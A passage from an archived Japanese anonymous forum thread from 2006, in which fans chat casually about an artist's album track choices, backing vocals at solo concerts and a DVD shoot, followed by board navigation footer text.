ミニアルバム用に作った曲をペニアルバムに使っちゃったんじゃない?

158 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:22:02
女性コーラス絶対にないとソロライブできない?



できないか・・・

159 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:57:18
>>157
かもな。
nanoでもDVD撮ったり時間食ったし、曲作る時間なかったもんな〜 ニガ
ま〜オレはPでもCでもどっちでもいいけどね〜w

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)